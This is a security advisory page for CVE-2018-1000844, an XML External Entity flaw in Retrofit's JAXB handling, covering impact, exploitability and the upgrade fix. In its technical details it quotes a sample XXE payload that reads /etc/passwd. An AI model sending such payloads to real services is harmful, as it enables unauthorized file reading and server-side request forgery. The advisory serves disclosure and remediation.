CVE-2018-1000844
XML External Entity (XXE) vulnerability in com.squareup.retrofit2:retrofit

What is CVE-2018-1000844 About?

This vulnerability is an XML External Entity (XXE) flaw in Square Open Source Retrofit versions prior to commit 4a693c5aeeef2be6c7ecf80e7b5ec79f6ab59437, specifically affecting JAXB processing. It allows attackers to remotely read local files or perform Server-Side Request Forgery (SSRF) attacks. Exploitation is relatively straightforward when crafted XML input is processed.

Affected Software

Technical Details

The `JAXB` component within Square Open Source Retrofit versions prior to commit 4a693c5aeeef2be6c7ecf80e7b5ec79f6ab59437 is vulnerable to XML External Entity (XXE) attacks. This occurs when the XML parser used by JAXB is not configured to disable the processing of external entities. An attacker can send a crafted XML payload that includes a `DOCTYPE` declaration with an external entity. For example, `<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>`. When the vulnerable Retrofit application processes this XML, the parser will resolve the external entity, allowing the attacker to retrieve local files (e.g., `/etc/passwd`) or initiate requests to internal or external systems via `http://` or `ftp://` schemes, leading to SSRF.

What is the Impact of CVE-2018-1000844?

Successful exploitation may allow attackers to read arbitrary files from the server's file system, perform Server-Side Request Forgery (SSRF) attacks, or potentially contribute to denial of service.

What is the Exploitability of CVE-2018-1000844?

Exploitation requires the attacker to send a crafted XML request to an endpoint that uses the vulnerable JAXB component in Retrofit. The complexity is low to moderate, as it involves inserting specific XML DOCTYPE declarations into the request. Authentication might not be required if the XML processing endpoint is publicly accessible. No specific privileges are necessary beyond the ability to submit a malicious XML request. This is a remote vulnerability. The likelihood of exploitation increases if the application accepts and parses untrusted XML input without disabling external entity processing.

What are the Known Public Exploits?

What are the Available Fixes for CVE-2018-1000844?

Available Upgrade Options

• com.squareup.retrofit2:retrofit
  • >2.0.0, <2.5.0 → Upgrade to 2.5.0

Additional Resources

• https://osv.dev/vulnerability/GHSA-j379-9jr9-w5cq
• https://nvd.nist.gov/vuln/detail/CVE-2018-1000844
• https://github.com/advisories/GHSA-j379-9jr9-w5cq
• https://github.com/square/retrofit/pull/2735
• https://github.com/square/retrofit
• https://github.com/square/retrofit/pull/2735

What are Similar Vulnerabilities to CVE-2018-1000844?

Similar Vulnerabilities: CVE-2017-1000487 , CVE-2017-10350 , CVE-2017-15707 , CVE-2018-11776 , CVE-2019-10086